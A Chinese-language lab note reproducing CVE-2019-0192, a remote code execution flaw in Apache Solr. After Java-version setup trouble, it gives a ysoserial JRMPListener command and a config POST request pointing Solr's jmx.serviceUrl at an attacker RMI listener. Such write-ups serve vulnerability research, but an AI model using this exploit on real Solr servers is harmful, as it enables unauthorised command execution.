solr(CVE-2019-0192),
PoC:
https://github.com/mpgn/CVE-2019-0192/
solr-6.6.5
http://120.52.51.16/archive.apache.org/dist/lucene/solr/6.6.5/solr-6.6.5.zip
运行的最低Java版本是8:
cqq@ubuntu:~/repos/cms/solr-6.6.5$ bin/solr -e techproducts -D com.sun.management.jmxremote
Your current version of Java is too old to run this version of Solr
We found version 1.7.0_21, using command 'java -version', with response:
java version "1.7.0_21"
Java(TM) SE Runtime Environment (build 1.7.0_21-b11)
Java HotSpot(TM) 64-Bit Server VM (build 23.21-b01, mixed mode)
Please install latest version of Java 1.8 or set JAVA_HOME properly.
Debug information:
JAVA_HOME: N/A
Active Path:
/home/cqq/bin:/home/cqq/.local/bin:/usr/bin:/bin:/usr/sbin:/sbin:/usr/local/go/bin:/home/cqq/go/bin:/home/cqq/go/bin
solr-6.2.1
http://120.52.51.16/archive.apache.org/dist/lucene/solr/6.2.1/solr-6.2.1.zip
虽然没强制说Java 7不能运行,但是报错Unsupported major.minor version 52.0,查了stackoverflow,也说是java版本问题:
cqq@ubuntu:~/repos/cms/solr-6.2.1$ bin/solr -e techproducts -Dcom.sun.management.jmxremote
Exception in thread "main" java.lang.UnsupportedClassVersionError: org/apache/solr/util/SolrCLI : Unsupported major.minor version 52.0
at java.lang.ClassLoader.defineClass1(Native Method)
at java.lang.ClassLoader.defineClass(ClassLoader.java:791)
at java.security.SecureClassLoader.defineClass(SecureClassLoader.java:142)
at java.net.URLClassLoader.defineClass(URLClassLoader.java:449)
at java.net.URLClassLoader.access$100(URLClassLoader.java:71)
at java.net.URLClassLoader$1.run(URLClassLoader.java:361)
at java.net.URLClassLoader$1.run(URLClassLoader.java:355)
at java.security.AccessController.doPrivileged(Native Method)
at java.net.URLClassLoader.findClass(URLClassLoader.java:354)
at java.lang.ClassLoader.loadClass(ClassLoader.java:423)
at sun.misc.Launcher$AppClassLoader.loadClass(Launcher.java:308)
at java.lang.ClassLoader.loadClass(ClassLoader.java:356)
at sun.launcher.LauncherHelper.checkAndLoadMain(LauncherHelper.java:482)
算了还是用5.x的solr吧。
5.5.3
按照这个:https://mp.weixin.qq.com/s/ZtqM2EhB2BbZmDt1omvF6A
用5.5.3版本
先启动起来,(发现不用-Dcom.sun.management.jmxremote参数也可以利用啊)
注意这里启动solr的方式中,solr这个脚本是根据环境中的java命令来判断Java版本的。比如/usr/bin/java,我这边是修改了这个java所指向的java版本来修改solr启动java版本的。
cqq@ubuntu:~/repos/cms/solr-5.5.3/bin$ ./solr -h 192.168.170.217 -e techproducts
Solr home directory /home/cqq/repos/cms/solr-5.5.3/example/techproducts/solr already exists.
Starting up Solr on port 8983 using command:
/home/cqq/repos/cms/solr-5.5.3/bin/solr start -p 8983 -s "/home/cqq/repos/cms/solr-5.5.3/example/techproducts/solr" -h 192.168.170.217
Waiting up to 30 seconds to see Solr running on port 8983 [/]
Started Solr server on port 8983 (pid=18463). Happy searching!
WARNING: Core 'techproducts' already exists!
Checked core existence using Core API command:
http://192.168.170.217:8983/solr/admin/cores?action=STATUS&core=techproducts
Solr techproducts example launched successfully. Direct your Web browser to http://192.168.170.217:8983/solr to visit the Solr Admin UI
再使用PoC执行
需要等待大概一分钟,才能完成执行的过程:(这个PoC有点长,感觉其实没必要吧)
执行命令:
java -cp ysoserial-master-ff59523eb6-1.jar ysoserial.exploit.JRMPListener 1099 Jdk7u21 "touch /tmp/test_by_cqq"
即在1099端口监听,然后发送以下请求:
在发送之前,需要确保
GET /solr/admin/cores?wt=json
的请求返回的响应json中的status字段的值第一个为:techproducts,
然后下面这个请求是根据前一个请求的结果来确定的。
POST /solr/techproducts/config HTTP/1.1
Host: 192.168.170.217:8983
User-Agent: python-requests/2.21.0
Connection: keep-alive
Content-Type: application/json
Content-Length: 92
{"set-property": {"jmx.serviceUrl": "service:jmx:rmi:///jndi/rmi://192.168.170.1:1099/obj"}}
即可触发。
下图说明命令已成功执行:
如果出现以下错误:
java.io.InvalidObjectException: Non-annotation type in annotation serial stream
则说明是Java版本高了,无法利用。
是说怎么JDK某个版本以上就不行了,因为有JEP 290这个特性
参考:
https://blog.csdn.net/u011721501/article/details/78555246